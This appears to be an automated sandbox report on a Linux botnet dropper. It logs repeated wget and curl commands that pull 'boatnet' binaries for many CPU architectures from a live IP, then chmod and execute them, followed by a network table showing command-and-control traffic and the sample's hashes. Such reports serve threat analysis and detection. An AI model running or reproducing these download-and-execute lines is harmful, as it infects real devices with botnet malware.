[chmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.sh4]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1440-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1449-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1458-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1467-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1476-5-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1534-6-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1562-7-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1573-8-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1582-9-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1591-10-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1602-11-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1611-12-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1620-13-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1639-14-0x0000000008048000-0x000000000805ce08-memory.dmp